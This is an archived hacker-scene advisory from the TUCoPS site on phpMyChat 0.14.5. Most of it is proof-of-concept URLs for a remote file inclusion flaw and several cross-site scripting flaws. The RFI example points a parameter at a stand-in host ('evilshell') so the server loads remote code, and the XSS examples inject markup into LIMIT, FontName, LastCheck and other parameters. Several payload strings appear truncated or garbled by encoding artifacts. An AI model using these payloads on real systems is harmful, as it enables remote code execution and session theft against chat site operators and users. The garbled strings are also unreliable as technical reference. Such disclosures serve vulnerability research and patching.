Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: PHP :: tb13692.htm

PhpMyChat remote file include, XSS



RFI and Multiple XSS in PhpMyChat
RFI and Multiple XSS in PhpMyChat



~~~~~~~~~~~~~~~~Application : phpMyChat 0.14.5~~~~~~~~~~~~~~~~=0D
=0D
=0D
Email ; beenudel1986@gmail.com=0D 
=0D
Website: http://phpmychat.sourceforge.net/=0D 
=0D
Many webhosting companies are offering this version of phpMychat in their cpanel :)=0D
=0D
                ----------------------------=0D
                |   Remote File Inclusion:  |=0D
                 ----------------------------=0D
=0D
=0D
http://localhost/path_to_phpMychat/chat/users_popupL.php3=0D 
Parameter = From=0D
=0D
POC = http://localhost/path_to_phpMychat/chat/users_popupL.php3?From=http://evilshell=0D 
=0D
=0D
=0D
=0D
                              ---------------=0D
                  |Multiple XSS |=0D
                              ---------------=0D
=0D
=0D
a.Vulnerable URL: http://localhost/phpmychat/chat/deluser.php3=0D 
Parameter = LIMIT=0D
=0D
POC =http://localhost/phpmychat/chat/config/start_page.css.php3?Charset=iso-8859-1&medium=10&FontName= >"'>=0D 
=0D
b. Vulnerable URL: http://www.localhost/mychat/chat/deluser.php3=0D 
Parameter = LIMIT=0D
=0D
POC = &AUTH_USERNAME=&AUTH_PASSWORD==0D">http://www.localhost/phpmychat/chat/deluser.php3?L=english&Link=&LIMIT=>"'>&AUTH_USERNAME=&AUTH_PASSWORD==0D 
=0D
c. Vulnerable URL: http://www.localhost/phpmychat/chat/edituser.php3=0D 
=0D
Parameter= Link , still lokking for pOC ;)=0D
=0D
d.Vulnerable URL= http://localhost/phpmychat/chat/users_popupL.php3=0D 
Parameter = LastCheck=0D
=0D
POC = http://localhost/mychat/chat/users_popupL.php3?From=..%2FphpMyChat.php3&L=english&LastCheck= ">'=0D 
=0D
e. Vulnerable URL: http://localhost/phpmychat/chat/users_popupL.php3=0D 
Parameter = B=0D
=0D
POC =http://localhost/phpmychat/chat/users_popupL.php3?From=..%2FphpMyChat.php3&L=english&LastCheck=1196698786&B= >">=0D 
=0D
f.Vulnerable URL: http://localhost/phmychat/chat/users_popupL.php3=0D 
Parameter =From=0D
=0D
POC = =0D">http://localhost/phpmychat/chat/users_popupL.php3?From=>">=0D 
=0D
g. Vulnerable URL = http://localhost/phpmychat/chat/config/start_page.css.php3=0D 
=0D
Parameter = FontName=0D
Parameter = medium=0D
=0D
h. Vulnerable URL: http://localhost/phpmychat/chat/config/style.css.php3=0D 
Parameter = FontName=0D
Parameter = medium=0D
=0D
POC = =0D">http://localhost/phpmychat//mychat/chat/config/style.css.php3?Charset=iso-8859-1&medium=10&FontName=>"'>=0D 
Try the second one urself or mail me to have the POC :P=0D
=0D
    ~~~~~~~~~~~~~~~~~~greetz to mah friend d3 , icqbomber , baltazar~~~~~~~~~~~~~~~~~~=0D
-- 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH